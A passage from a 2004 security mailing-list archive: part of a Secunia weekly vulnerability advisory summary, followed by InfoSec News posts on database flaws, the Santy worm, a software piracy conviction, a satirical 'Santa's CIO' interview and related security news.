Where:       From remote
Impact:      Cross Site Scripting
Released:    2004-12-16

A vulnerability has been reported in iPlanet Messaging Server / Sun ONE Messaging Server, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/13497/

--

[SA13623] SUSE update for samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-23

SUSE has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13623/

--

[SA13615] Fedora update for samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-22

Fedora has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13615/

--

[SA13613] Red Hat update for samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-22

Red Hat has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13613/

--

[SA13612] Fedora update for krb5

Critical:    Moderately critical
Where:       From local network
Impact:      Privilege escalation, System access
Released:    2004-12-22

Fedora has issued an update for krb5. This fixes two vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges and potentially by malicious users to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13612/

--

[SA13597] Red Hat update for nfs-utils

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2004-12-21

Red Hat has issued an update for nfs-utils. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13597/

--

[SA13592] Kerberos V5 "libkadm5srv" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-21

Michael Tautschnig has reported a vulnerability in Kerberos V5, which potentially can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13592/

--

[SA13582] Trustix update for samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-20

Trustix has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13582/

--

[SA13573] Fedora update for CUPS

Critical:    Moderately critical
Where:       From local network
Impact:      Manipulation of data, DoS, System access
Released:    2004-12-20

Fedora has issued an update for CUPS. This fixes two vulnerabilities, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13573/

--

[SA13570] Gentoo update for Samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-20

Gentoo has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13570/

--

[SA13540] LinPopUp "strexpand()" Function Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-20

Stephen Dranger has reported a vulnerability in LinPopUp, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13540/

--

[SA13510] CUPS hpgltops and lppasswd Vulnerabilities

Critical:    Moderately critical
Where:       From local network
Impact:      Manipulation of data, DoS, System access
Released:    2004-12-17

Two vulnerabilities have been reported in CUPS, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13510/

--

[SA13507] Red Hat update for samba

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2004-12-17

Red Hat has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13507/

--

[SA13601] Fedora update for namazu

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2004-12-21

Fedora has issued an update for namazu. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/13601/

--

[SA13600] Namazu "namazu.cgi" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2004-12-21

A vulnerability has been reported in Namazu, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/13600/

--

[SA13588] Mandrake update for aspell

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2004-12-21

MandrakeSoft has issued an update for aspell. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13588/

--

[SA13587] Gentoo update for nasm

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Gentoo has issued an update for nasm. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13587/

--

[SA13556] Email Sanitizer Unspecified MIME Denial of Service Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      DoS
Released:    2004-12-20

A vulnerability has been reported in Email Sanitizer, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/13556/

--

[SA13543] NASM "error()" Function Buffer Overflow Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Jonathan Rockway has reported a vulnerability in NASM, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13543/

--

[SA13610] SuSE update for kernel

Critical:    Less critical
Where:       From local network
Impact:      Unknown, Exposure of sensitive information, Privilege escalation, DoS
Released:    2004-12-22

SUSE has issued an update for the kernel. This fixes multiple vulnerabilities, which can be exploited to cause a DoS (Denial of Service), gain knowledge of sensitive information, or gain escalated privileges.
Full Advisory: http://secunia.com/advisories/13610/

-- [SA13642] Docbook-to-Man Insecure Temporary File Creation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-23

Javier Fernández-Sanguino Peña has reported a vulnerability in Docbook-to-Man, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13642/

-- [SA13640] LPRng "lprng_certs.sh" Script Insecure Temporary File Creation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-23

Javier Fernández-Sanguino Peña has reported a vulnerability in LPRng, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13640/

-- [SA13633] Debian debmake Insecure Temporary Directory Creation
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-23

Javier Fernández-Sanguino Peña has reported a vulnerability in debmake, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13633/

-- [SA13598] Red Hat update for rh-postgresql
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-21

Red Hat has issued an update for rh-postgresql. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13598/

-- [SA13594] Red Hat update for glibc
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-21

Red Hat has issued an update for glibc. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13594/

-- [SA13589] IBM AIX Multiple Privilege Escalation Vulnerabilities
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-21

Four vulnerabilities have been reported in AIX, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13589/

-- [SA13575] Debian update for ethereal
Critical: Less critical
Where: Local system
Impact: DoS
Released: 2004-12-21

Debian has issued an update for ethereal. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/13575/

-- [SA13572] Linux Kernel Multiple Vulnerabilities
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information, DoS
Released: 2004-12-22

Multiple vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain knowledge of potentially sensitive information.

Full Advisory: http://secunia.com/advisories/13572/

-- [SA13565] HP-UX newgrp Privilege Escalation Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-20

A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13565/

-- [SA13528] changepassword Privilege Escalation Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-17

Ariel Berkman has reported a vulnerability in changepassword, allowing malicious, local users to escalate their privileges.
Full Advisory: http://secunia.com/advisories/13528/

-- [SA13521] Debian update for cscope
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-17

Debian has issued an update for cscope. This fixes a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13521/

-- [SA13519] Debian update for a2ps
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-20

Debian has issued an update for a2ps. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13519/

-- [SA13505] Red Hat update for zip
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-17

Red Hat has issued an update for zip. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13505/

-- [SA13503] Gentoo update for cscope
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-17

Gentoo has issued an update for cscope. This fixes a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.

Full Advisory: http://secunia.com/advisories/13503/

-- [SA13501] NetBSD "compat" Privilege Escalation Vulnerabilities
Critical: Less critical
Where: Local system
Impact: Privilege escalation, DoS
Released: 2004-12-17

Evgeny Demidov has reported some vulnerabilities in NetBSD, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges.
Full Advisory: http://secunia.com/advisories/13501/

-- [SA13498] Gentoo update for vim/gvim
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-16

Gentoo has issued updates for vim and gvim. These fix some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory: http://secunia.com/advisories/13498/

-- [SA13625] Mandrake update for logcheck
Critical: Not critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-23

MandrakeSoft has issued updated packages for logcheck. These fix a security issue, which potentially can be exploited by malicious, local users to escalate their privileges.

Full Advisory: http://secunia.com/advisories/13625/

-- [SA13617] SUSE update for ncpfs
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2004-12-22

SUSE has issued an update for ncpfs. This fixes a potential vulnerability, which can be exploited by malicious, local users.

Full Advisory: http://secunia.com/advisories/13617/

-- [SA13549] uml-utilities Ethernet Connection Drop Security Issue
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2004-12-20

Danny Lungstrom has reported a security issue in uml-utilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/13549/

Other: Cross Platform:

-- [SA13632] Sybase ASE Three Unspecified Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Unknown
Released: 2004-12-23

NGSSoftware has reported three vulnerabilities with unknown impacts in Sybase ASE.

Full Advisory: http://secunia.com/advisories/13632/

-- [SA13508] MPlayer Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-17

Multiple vulnerabilities have been reported in MPlayer, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/13508/

-- [SA13620] 2Bgal "id_album" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2004-12-23

Romain Le Guen has reported a vulnerability in 2Bgal, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/13620/

-- [SA13564] IMG2ASCII Unspecified Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2004-12-20

A vulnerability with an unknown impact has been reported in IMG2ASCII.

Full Advisory: http://secunia.com/advisories/13564/

-- [SA13563] Kayako eSupport Cross-Site Scripting and SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2004-12-20

James Bercegay has reported some vulnerabilities in Kayako eSupport, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Full Advisory: http://secunia.com/advisories/13563/

-- [SA13555] Yanf "get()" Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-20

Ariel Berkman has reported a vulnerability in Yanf, which can be exploited by malicious people to compromise a user's system.

Full Advisory: http://secunia.com/advisories/13555/

-- [SA13518] Cosminexus Web Contents Generator Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-17

The vendor has acknowledged a vulnerability in Cosminexus Web Contents Generator (Macromedia JRun), which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13518/

-- [SA13515] Moodle Multiple Unspecified Security Issues
Critical: Moderately critical
Where: From remote
Impact: Unknown, Security Bypass, Exposure of sensitive information
Released: 2004-12-17

Multiple security issues have been reported in Moodle. Some of these can potentially be exploited by malicious people to disclose sensitive information and bypass certain security restrictions, and others have unknown impacts.

Full Advisory: http://secunia.com/advisories/13515/

-- [SA13513] Ikonboard "st" and "keywords" SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2004-12-17

Positive Technologies has reported a vulnerability in Ikonboard, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory: http://secunia.com/advisories/13513/

-- [SA13500] AtBas 2fax "expandtabs()" Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-17

Ariel Berkman has discovered a vulnerability in AtBas 2fax, potentially allowing malicious people to gain system access.

Full Advisory: http://secunia.com/advisories/13500/

-- [SA13619] PsychoStats "login" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-23

James Bercegay has reported a vulnerability in PsychoStats, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/13619/

-- [SA13576] PHPFormMail "output_html()" Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-20

Some vulnerabilities have been reported in PHPFormMail, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/13576/

-- [SA13574] PHP-Nuke Workboard Module Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-20

Lostmon has reported two vulnerabilities in the Workboard module for PHP-Nuke, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory: http://secunia.com/advisories/13574/

-- [SA13566] PERL Crypt::ECB Module ASCII "0" Encoding Security Issue
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-21

Bennett R. Samowich has discovered a security issue in Crypt::ECB, which makes it easier for malicious people to brute force passwords.

Full Advisory: http://secunia.com/advisories/13566/

-- [SA13504] 68 Designs Froogle Installation Security Issue
Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-17

Lostmon has reported a security issue in 68 Designs Froogle, which potentially can be exploited by malicious people to gain administrative privileges.

Full Advisory: http://secunia.com/advisories/13504/

-- [SA13593] Symantec Brightmail AntiSpam Notifier Denial of Service
Critical: Not critical
Where: From remote
Impact: DoS
Released: 2004-12-21

A weakness has been reported in Symantec Brightmail AntiSpam, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory: http://secunia.com/advisories/13593/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe: http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

From isn at c4i.org Fri Dec 24 03:16:44 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:33:58 2004
Subject: [ISN] Database flaws more risky than thought
Message-ID:

http://news.com.com/Database+flaws+more+risky+than+thought/2100-1002_3-5502538.html

By Robert Lemos
Staff Writer, CNET News.com
December 23, 2004

Details of multiple security flaws in Oracle and IBM databases have been released by the security company that found them.

The flaws, which were described in general terms in August and September by Next-Generation Security Software, could allow an attacker to remotely compromise servers running the database programs. Security company Symantec raised its Internet threat rating of the flaws to 2 from 1, based on the details released on Thursday.

NGSSoftware gave users of the databases more than three months to fix their systems when it announced its discovery of the flaws. Oracle has already released patches for the 10 vulnerabilities affecting its 9i database, and IBM has issued fixes for two flaws in DB2 versions 7 and 8.1.

"Some of these are more serious than others," said David Litchfield, a security researcher and co-founder of U.K.-based NGSSoftware. "Most of these vulnerabilities can be exploited remotely."

The advisories can be found on NGSSoftware's Web site.

From isn at c4i.org Fri Dec 24 03:16:55 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:34:00 2004
Subject: [ISN] Army focuses on cyber protection
Message-ID:

http://www.fcw.com/fcw/articles/2004/1220/web-armywp-12-23-04.asp

By Frank Tiboni
Dec. 23, 2004

A recently issued Army white paper, "Fight the Network," provides a new framework for the Signal Regiment, the service's communications organization, as it changes to support lighter, more mobile warfighting units.

Army information technology officials devised the document to help foster a different mind-set for communications personnel in defending and managing the service's networks, said Gordon Van Vleet, public affairs officer for the service's Network Enterprise Technology Command/Ninth Army Signal Command at Fort Huachuca, Ariz. Netcom officials oversee the operation, management and protection of the Army's networks.

"Never before has the Signal Regiment been as critical to the success of our Army," Lt. Gen. Steve Boutelle, the service's chief information officer, wrote in the document's introduction.

Army IT officials want the service's communications personnel to "fight" the network so they can provide secure, ample communications on demand to soldiers in combat anywhere in the world. The document identifies the importance of network availability, interoperability and control.

The white paper marks Army IT officials' third wide-scale attempt in recent months to alert personnel to the urgency of operating and protecting the service's networks. In August, Boutelle told Army IT personnel at a conference that the service's systems are increasingly under cyberattack. In November, Boutelle's office released a brochure, "Fight the Network: The Network as a Weapon System," that highlights main points in the white paper.

Industry officials said Boutelle and Army IT officials will likely focus on strengthening the operation, management and protection of the service's IT infrastructure during the upcoming fiscal 2006 budget process. They expect that Army officials will want to further consolidate the service's enterprise IT infrastructure.
Among projects the Army wrapped up this past year were developing and fielding a more mobile battlefield communications system, the Joint Network Node; and completing the acquisition and speeding the development of a future battlefield communications system, the War-fighter Information Network-Tactical.

From isn at c4i.org Fri Dec 24 03:17:06 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:34:02 2004
Subject: [ISN] Security jobs on the rise
Message-ID:

http://www.nwfusion.com/news/2004/1223securjobs.html

By Grant Gross
IDG News Service
12/23/04

While IT employment numbers may be lagging, there is a glimmer of hope. The number of cybersecurity professionals is projected to grow at an annual compound rate of nearly 14% from now until 2008, according to a study released in November.

"The Information Security Workforce Study," conducted by IDC (a sister company of CIO's publisher) for the International Information Systems Security Certification Consortium, or (ISC)2, projects that the number of information security professionals worldwide will be 2.1 million in 2008, up from 1.3 million currently.

The survey of 5,371 full-time information security professionals in 80 countries found that 97% of respondents had moderate to very high expectations for career growth. Security professionals have also experienced growth in job prospects, career advancement, higher base salaries and salary premiums for certification at faster rates than other areas of IT.

The survey results speak to the growing importance of information security, which "is beginning to be recognized more broadly as an enterprisewide area," says James R. Wade, a member of (ISC)2's board of directors.
From isn at c4i.org Fri Dec 24 03:19:07 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:34:04 2004
Subject: [ISN] An interview with Santa's CIO
Message-ID:

http://www.theregister.co.uk/2004/12/23/santas_cio_interview/

By William Knight
23rd December 2004

With hands on management and a little bit of star dust, Santa's IT operation goes without a hitch year after year. William Knight talks to the big guy's very secretive CIO and finds out it's not always eternal joyfulness at Christmas HQ.

As interviews go this was not hard to arrange. Some weeks ago I'd said it would be interesting to meet Santa's CIO and he must have been listening because late one evening the door bell rings and an immaculately dressed chauffeur asks me if I'd like an interview. A huge limo is parked under the street lamp and circling exhaust fumes create a mysterious vignette. I note the number plate "RUD 0LF", just as the rear door opens and the chauffeur ushers me through.

Inside, deep in white leather upholstery, sits an archetypal business man. No beard or red hat, just a dark suit and plain tie, with a lapel pin in the shape of a small Christmas pudding. Günter Klaus is CIO of Christmas HQ, and as the mist billows round the windows and the car sets off he explains how his responsibilities centre on the NGBS (Naughty Girl & Boy System) with its billions of records.

The reality of Christmas HQ is far from the pixies and fairies wonderland described in legend. Klaus must manage the terabytes of data and facilitate the Big Day (BD) or Christmas Eve. "We have tremendous organisation, logistics and planning for each year's timetable," he says. "I must make sure each child gets only what their record demands."

The size of the job is impressive and while delivery is run with Santa's special abilities, IT must rely on its own resources. "Magic is very expensive and hard to control," says Klaus, explaining how it requires technical expertise to wield magic effectively.
"Things can go very wrong without the right level of support, maintenance and specialist staff.

"We recently implemented a Magic Oriented Architecture (MOA) but had enormous difficulties integrating NGBS. The project has been a major compliance exercise, but no matter what products say on the box, we've found there's no silver bullet."

Compliance is Klaus's top item. Christmas HQ runs via many organisations world wide and each has its own requirements. Even though the enterprise is beyond any single jurisdiction they must still respond to requests from subsidiaries, and pressure is escalating due to ever-more financial products given away in Christmas stockings. "Kids don't just want chocolate and model cars," he says. "They have sophisticated tastes we have to cater for."

The UK's data protection act caused tremendous problems. "We were inundated with requests from upset little boys and girls who believed Santa had got it wrong; that they had in fact been good," he says. They have been forced into a massive record management program and employ hundreds of data entry staff at head office.

On cue the car door opens and we step into a huge white-walled computer centre. Giant icicles hang majestically from the ceiling and rows of decorated Christmas trees serve as partitions between cells of busy workers tapping at their workstations. I wonder at the mix of ice and electricity, but though the temperature is mild - most of the staff were wearing T-shirts emblazoned with "Team Santa - Delivering IT for Christmas" - the ice isn't melting.

I follow him along a partition to the bank of a babbling river running right through the middle of the building. He stops at the entrance to a foot bridge and swipes an ID card. A tinsel-clad barrier rises up to let us through. "On one side of the bridge we have the technicians," he says, "and on the other the management." He stops in the middle and points to a group of Elf consultants constructing another crossing further downstream.
"The consultants tell us to build bridges between the business and the IT department, that we sometimes misunderstand each other."

We settle in an open-plan lounge on the far side of the river and Klaus describes why communication is so important. "Each year we have to finish by first light on 25 December - there is no option. Misunderstanding causes delays so we are always building more bridges between the camps." His request to move to a building without a river has been postponed for another year and Klaus has to deal with the realities of the situation. "Each year's BD is the goal. We have to remain focussed," he says.

The rigid timetable and communication overhead create formidable pressure and, despite the wonderful surroundings and holiday atmosphere, this can throw up mavericks. Klaus relates an incident when the NGBS was updated with thousands of bogus records. "We had sacks of toys and gifts delivered to a warehouse full of mock-up boys and girls. It was a terrible scam," he says. "We only found out when our gnome-built produce was listed on eBay the day after Christmas." They traced the perpetrators through a hacked server on Christmas Island and to a dacha on the Black Sea. It turned out to be disgruntled contractor Gnomes annoyed at being left off the Christmas party guest list because they weren't permanent staff.

Klaus talks of other threats and stresses his belief in careful risk management. To illustrate his point he pulls out a risk list showing "Incompetent Management" at the top. He laughs when I point it out. "Oh! I have them mixed up, this is the anonymous risks," he says and searches his pockets for another list. "This is it," he says. "The Christmas number one is always rather predictable I'm afraid." The list shows "Skills gap" at the top and a mitigation of "Identify training requirements". His staff are capable of solving most technical problems, so when they identify areas that need better skills they order a book from Amazon, he says.
The talent of his staff is hard to dispute. The RFID system - that's Rudolf's Indicated Direction - was created by a genius developer in an afternoon. "It uses a GPS system cross linked to the NGBS and a Neural Net finds the best route for Santa to take on the BD. The optimum route must consider sleigh loading, distribution points, weather patterns - all this is too complicated for procedural languages." Results are transmitted via an encrypted, always-on XMas Link (XML) to the big guy's monitor, and so far the system has never broken down.

But now that the genius developer involved has left the company without writing anything down, they daren't touch it. "Nobody is quite sure how the RFID works," he says, "so we don't mention it at project meetings and we never reboot it." Other programs have been bolted on the side of the RFID, so now they aren't certain whether results come from RFID or not. "Without it Santa's job would be impossible," he says. "We can never replace it or change it." He shrugs and reluctantly admits that an IT system has dictated how the business works. He hopes that one day they'll get the magic budget to fund a replacement, but in the meantime they have too many fixes to make in all the subsidiary systems.

Despite the difficulties Klaus has an enviable record. For thirty years, not one deserving child has been missed from the Big Day's delivery and he credits his hard working staff and the dedication of the Boss. "We have a no-failure policy," he says. "We understand the situation and we work to it." He hopes that other CIOs can look forward to perfect deliveries at Christmas and wishes everybody a happy new year.

From isn at c4i.org Fri Dec 24 03:20:38 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 24 03:34:06 2004
Subject: [ISN] Happy Holidays!
Message-ID:

The staff at InfoSec News and C4I.org would like to wish you a very happy holidays and all the best for the new year!
All the best for a happy, healthy and prosperous 2005 to you and your loved ones, I hope everyone else's hopes, wishes, & dreams come true!

Cheers!

William Knowles
wk@c4i.org

*==============================================================*
"Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Wed Dec 29 01:31:40 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:28 2004
Subject: [ISN] Officials unseal piracy records
Message-ID:

http://www.press-citizen.com/apps/pbcs.dll/article?AID=/20041224/NEWS01/412240312/1079/RSS01

By Brian Sharp
Iowa City Press-Citizen
December 24, 2004

An Iowa City man who admitted to pirating copyrighted software then distributing it online is personally responsible for as much as $200,000 in losses to the industry, according to federal records unsealed Thursday.

Jathan Desir, 26, became the first person convicted as part of "Operation Fastlink," [1] a multi-national investigation launched in April. Records show one of the two online libraries he helped create totaled 13,000 titles before FBI agents arrived at his home this spring.

Desir, registered as a student at the University of Iowa, waived indictment and pleaded guilty Wednesday in U.S. District Court in Des Moines. He faces a maximum 15 years in prison on felony counts of copyright infringement and conspiracy. Sentencing is set for March 18.

He was part of the "warez scene," an underground network of individuals and organized groups that compete in the market of large-scale, illegal dissemination of protected software. Members gain access to copyrighted material, often before its release, crack the digital protections and put it online for others to access, reproduce or pass along.
According to federal court records:

In January 2003, Desir and others set up an online library for a private group to share movies, games, utility software and music. The library grew to about 13,000 titles by the time of the federal raid in April.

Transfer logs obtained from the computer service show Desir transferred numerous titles between Aug. 16, 2003, and April 2, 2004. Records show he copied and distributed at least 10 items every six months. He accessed the system from his Iowa City home, records show. No address was provided.

On April 21, FBI agents executed a search warrant at his residence, seizing six personal computers, various computer components and equipment as well as computer games and software. Desir cooperated with authorities from the beginning, even signing a statement detailing his activities. He also has admitted to creating a second library federal agents seized in California.

The search of Desir's residence was part of "Operation Fastlink," which targeted the underground community's hierarchy with agents conducting more than 120 searches within 24 hours in 27 states and 11 foreign countries. At the time, authorities identified nearly 100 people as leaders or high-ranking members of international piracy groups.

Business Software Alliance, which represents several software manufacturers, examined the two computer servers linked to Desir and reported that each contained client titles exceeding $2,500 in retail value. The $2,500 value is a benchmark in the federal criminal code.

Desir's sentence, once imposed, may still be reduced if he complies with all aspects of the plea agreement and assists in the investigation and prosecution of one or more others identified in the piracy probe.
[1] http://www.cybercrime.gov/desirPlea.htm

From isn at c4i.org Wed Dec 29 01:31:50 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:31 2004
Subject: [ISN] Google worm targets AOL, Yahoo
Message-ID:

http://news.com.com/Google+worm+targets+AOL,+Yahoo/2100-7349_3-5504769.html

By Paul Festa
Staff Writer, CNET News.com
December 28, 2004

Update: Days after Google acted to thwart the Santy worm, security firms warned that variants have begun to spread using both Google and other search engines.

The Santy problem originally flared up a week ago as bulletin board Web sites found their pages erased and defaced by the worm's own text. The worm spread by targeting pages that used vulnerable versions of the PHP Bulletin Board (phpBB) software, and used Google to locate those pages.

After Google took measures to prevent the worm from executing Google searches for the faulty bulletin board software, Santy variants are making the rounds using AOL and Yahoo search, according to security firms, and are still targeting Google as well.

"Perl.Santy.B is a worm written in Perl script that attempts to spread to Web servers running versions of the phpBB 2.x bulletin board software prior to 2.0.11," warned Symantec in a Dec. 26 bulletin. "It uses AOL or Yahoo search to find potential new infection targets."

AOL, which uses Google for its underlying search technology, said on Tuesday that its search engine should benefit from whatever protective measures Google implemented.

"Google is only returning results associated with sites not vulnerable to the exploit packed by Perl.Santy," said AOL spokesman Andrew Weinstein. "So, as the issue has been handled by Google, we're able to say that we're blocking requests of this type."

Yahoo, which dumped Google's search technology in February, could not be reached for comment.

Several other variants are cropping up. Santy.c targets Google once again.
Kaspersky Labs today renamed Santy.d and Santy.e to Spyki.a and Spyki.b, citing significant differences in the worms' structure from earlier Santies. The security firm also said the new worms were using the Brazilian Google for their exploits.

Security researchers last week faulted Google for not responding more swiftly to the emerging Santy threat.

The Santy worm and its variants affect only targeted bulletin board sites and do not pose a threat to Web surfers who visit them.

From isn at c4i.org Wed Dec 29 01:32:02 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 29 01:51:32 2004
Subject: [ISN] Bush Needs To Ramp Up Cybersecurity In New Year
Message-ID:

http://www.informationweek.com/story/showArticle.jhtml;jsessionid=FXTXM3TQGBNY0QSNDBCSKHSCJUMEKJVN?articleID=56200702

By Larry Greenemeier
Dec. 28, 2004

The Bush administration plans to address the demands to advance its cybersecurity policies in the new year, but some critics question whether the administration will go far enough to protect the United States from increasingly sophisticated cyberattacks and security breaches.

The administration's stance is that cybersecurity's moving forward will inherently be part of any new federal government IT initiatives. Others, however, believe the president should create a distinct administrative cybersecurity position within the Homeland Security Department to oversee progress in the federal government and act as a liaison with private industry.

